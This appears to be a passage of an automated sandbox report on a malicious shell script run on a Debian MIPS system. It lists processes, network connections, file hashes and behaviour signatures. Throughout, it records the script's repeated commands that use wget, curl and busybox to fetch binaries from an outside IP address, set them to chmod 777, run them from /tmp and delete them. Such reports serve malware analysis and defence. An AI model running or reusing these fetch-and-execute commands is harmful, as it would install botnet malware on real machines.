/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf

[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/rm

[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/usr/bin/wget

[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/chmod

[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5

[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/rm

[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/usr/bin/wget

[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/chmod

[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao

[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/rm

[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/usr/bin/wget

[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/chmod

[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf

[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/rm

[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/usr/bin/wget

[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/chmod

[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5

[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/bin/rm

[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]

/usr/bin/wget

[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/chmod

[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in

[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/rm

[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/usr/bin/wget

[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/chmod

[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR

[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/rm

[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/usr/bin/wget

[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/chmod

[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss

[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/rm

[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/usr/bin/wget

[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/chmod

[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw

[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/rm

[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/usr/bin/wget

[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/chmod

[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE

[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/rm

[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/usr/bin/wget

[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/chmod

[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5

[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/rm

[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/usr/bin/wget

[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/chmod

[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok

[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/rm

[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/usr/bin/wget

[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/chmod

[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo

[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/rm

[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/usr/bin/wget

[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/chmod

[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P

[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/rm

[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/usr/bin/wget

[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/chmod

[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw

[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/rm

[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/usr/bin/wget

[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/chmod

[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0

[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/rm

[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/761-1-0xb6778000-0xb6789044-memory.dmp

memory/824-2-0xb674f000-0xb6760044-memory.dmp

memory/896-3-0xb66fe000-0xb670f044-memory.dmp

memory/936-4-0xb672d000-0xb673e044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-21 01:07

Reported

2024-11-21 01:09

Platform

debian9-mipsbe-20240729-en

Max time kernel

74s

Max time network

76s

Command Line

[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok N/A
N/A /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo N/A
N/A /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P N/A
N/A /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw N/A
N/A /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 N/A
N/A /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 N/A
N/A /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in N/A
N/A /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR N/A
N/A /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss N/A
N/A /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw N/A
N/A /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE N/A
N/A /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao N/A
N/A /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf N/A
N/A /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 N/A
N/A /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao N/A
N/A /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf N/A
N/A /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 N/A
N/A /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in N/A
N/A /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR N/A
N/A /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss N/A
N/A /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw N/A
N/A /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE N/A
N/A /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 N/A
N/A /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok N/A
N/A /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo N/A
N/A /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P N/A
N/A /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw N/A
N/A /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao N/A
N/A N/A /bin/rm N/A
N/A N/A /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /usr/bin/curl N/A
File opened for modification /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /usr/bin/curl N/A
File opened for modification /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /usr/bin/curl N/A
File opened for modification /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /usr/bin/curl N/A
File opened for modification /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /usr/bin/curl N/A
File opened for modification /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /usr/bin/curl N/A
File opened for modification /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /usr/bin/curl N/A
File opened for modification /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /usr/bin/curl N/A
File opened for modification /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /usr/bin/curl N/A
File opened for modification /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /usr/bin/curl N/A
File opened for modification /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /usr/bin/curl N/A
File opened for modification /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /usr/bin/curl N/A
File opened for modification /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 /usr/bin/curl N/A
File opened for modification /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /usr/bin/curl N/A
File opened for modification /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf /usr/bin/curl N/A
File opened for modification /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /usr/bin/curl N/A
File opened for modification /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /usr/bin/curl N/A
File opened for modification /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /usr/bin/curl N/A
File opened for modification /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /usr/bin/curl N/A
File opened for modification /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /usr/bin/curl N/A
File opened for modification /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE /usr/bin/curl N/A
File opened for modification /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE /usr/bin/curl N/A
File opened for modification /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /usr/bin/curl N/A
File opened for modification /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /usr/bin/curl N/A
File opened for modification /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /usr/bin/curl N/A
File opened for modification /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /usr/bin/curl N/A
File opened for modification /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 /usr/bin/curl N/A
File opened for modification /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf /usr/bin/curl N/A

Processes

/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh

[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/chmod

[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok

[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/rm

[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/usr/bin/wget

[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/chmod

[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo

[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/rm

[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/usr/bin/wget

[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/chmod

[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P

[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/rm

[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/usr/bin/wget

[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/busybox

